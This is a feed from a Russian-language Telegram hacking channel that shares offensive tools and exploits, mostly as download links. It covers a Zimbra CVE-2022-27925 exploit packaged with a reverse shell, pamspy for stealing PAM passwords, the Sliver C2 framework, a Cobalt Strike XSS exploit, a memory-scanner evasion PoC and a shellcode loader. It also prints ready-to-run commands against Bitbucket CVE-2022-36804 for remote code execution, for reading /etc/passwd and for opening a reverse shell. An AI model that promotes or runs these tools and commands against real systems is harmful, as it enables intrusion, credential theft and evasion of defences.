CVE-2022-27925-zimbra_Revshell.zip
3.8 KB
Мы уже постили
Вот тот же сплоит, только с реализацией reverseShell (для ленивых)
😋
exploit для CVE-2022-27925 (zimbra)Вот тот же сплоит, только с реализацией reverseShell (для ленивых)
😋
🔥6
админам на заметку:
Как быстро раcпарсить RDP логи и понять как авторизовался удаленный юзер (kerberos или NTLM)
Download get-RdpLogonEvent.ps1
#windows #rdp
Как быстро раcпарсить RDP логи и понять как авторизовался удаленный юзер (kerberos или NTLM)
Download get-RdpLogonEvent.ps1
#windows #rdp
👍10
secretscanner.noscript
262.3 KB
SecretScanner
Ищем секреты в образах контейнеров или файловых системах.
*
Инструмент автономный, ищет контейнеры и файловые системы хоста, после чего сравнивает найденное с со своей базой данных, в которой на данный момент около 140 секретных типов
Download
#docker #security
Ищем секреты в образах контейнеров или файловых системах.
*
Инструмент автономный, ищет контейнеры и файловые системы хоста, после чего сравнивает найденное с со своей базой данных, в которой на данный момент около 140 секретных типов
Download
#docker #security
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
pamspy - Воруем учетки в
*
pamspy подгружает пользовательскую программу eBPF, чтобы перехватить функцию
*
DOWNLOAD ——-> pamspy
#linux #pam
Linux используя eBPF
PAM модулями пользуются многие приложения для аутентификации (sudo, sshd, passwd и так далее), и статей по теме заBACKDOORивания PAM модулей в инете предостаточно.*
pamspy подгружает пользовательскую программу eBPF, чтобы перехватить функцию
pam_get_authtok из libpam.so. И каждый раз когда условный пользователь пытается пройти аутентификацию он дергает pam_get_authtok - тут то pamspy выдернет пароль !*
DOWNLOAD ——-> pamspy
#linux #pam
🔥2👍1
Cobalt Strike: и его payloads
Разбираемся что и как, анализируем и декодируем. Хорошая статья, рекомендую !
Read
#cobaltstrike
Разбираемся что и как, анализируем и декодируем. Хорошая статья, рекомендую !
Read
#cobaltstrike
👍1
CVE-2022-36804-PoC-bitbucket.zip
6.5 KB
CVE-2022-36804 - BitbucketДля versions <8.3.1 (так как патч уже выпущен)
Сплоит ищет общедоступные репы на хосте
Bitbucket
для исполнения уязвимости.
*
Если открытой репы нет, то требуется действительный файл cookie
BITBUCKETSESSIONID. *
RCE (Remote Code Execution)
CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/
Download /etc/passwdCVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/
Reverse_shellCVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/
#bitbucket👍1
На фоне печальных новостей про
И такой инструмент ЕСТЬ !
*
Sliver (кроссплатфоменный, опенсорсный, активно развивается)
*
Download\скачать Sliver
Site: Sliver
Video guides: lesson-1, lesson-2, lesson-3
Book: в тему поста тут
😎☠️🎃
CobaltStrike, некоторые ребята задаются вопросом: "А может заменить этот платный кобальт на что то другое ?"И такой инструмент ЕСТЬ !
*
Sliver (кроссплатфоменный, опенсорсный, активно развивается)
*
Download\скачать Sliver
Site: Sliver
Video guides: lesson-1, lesson-2, lesson-3
Book: в тему поста тут
😎☠️🎃
🔥5👍3😱1
cve-2022-39197
Та самая XSS найденная в Cobalt Strike 4.7
Еще раз прочитать про дырку
Скачать exploit
#cobaltstrike #exploit
Та самая XSS найденная в Cobalt Strike 4.7
Еще раз прочитать про дырку
Скачать exploit
#cobaltstrike #exploit
👍4
Советую присмотреться и начать мониторить этот блог !
POC для нового метода обхода сканеров памяти
Cronos
POC для нового метода обхода сканеров памяти
Cronos
GitHub
GitHub - Idov31/Cronos: PoC for a sleep obfuscation technique leveraging waitable timers to evade memory scanners.
PoC for a sleep obfuscation technique leveraging waitable timers to evade memory scanners. - Idov31/Cronos
👍11
Ни мы, ни Народно-освободительная армия Китая, Вам ничего не говорили 🪖
ShellCode_Loader
#shellcode #msf #cobaltstrike
ShellCode_Loader
#shellcode #msf #cobaltstrike
👍3
Shift+F10=system
Забавнейший
Дырку microsoft признали, но багой не считают и исправлять не будут )))
*
В общем смешнейший privilge escalation до прав system )))
Читаем вникаем
Смотрим и смеемся
#windows
Забавнейший
bypass в windows (в перспективе от winXP до win11 ) Дырку microsoft признали, но багой не считают и исправлять не будут )))
*
В общем смешнейший privilge escalation до прав system )))
Читаем вникаем
Смотрим и смеемся
#windows
😱14🔥9👍1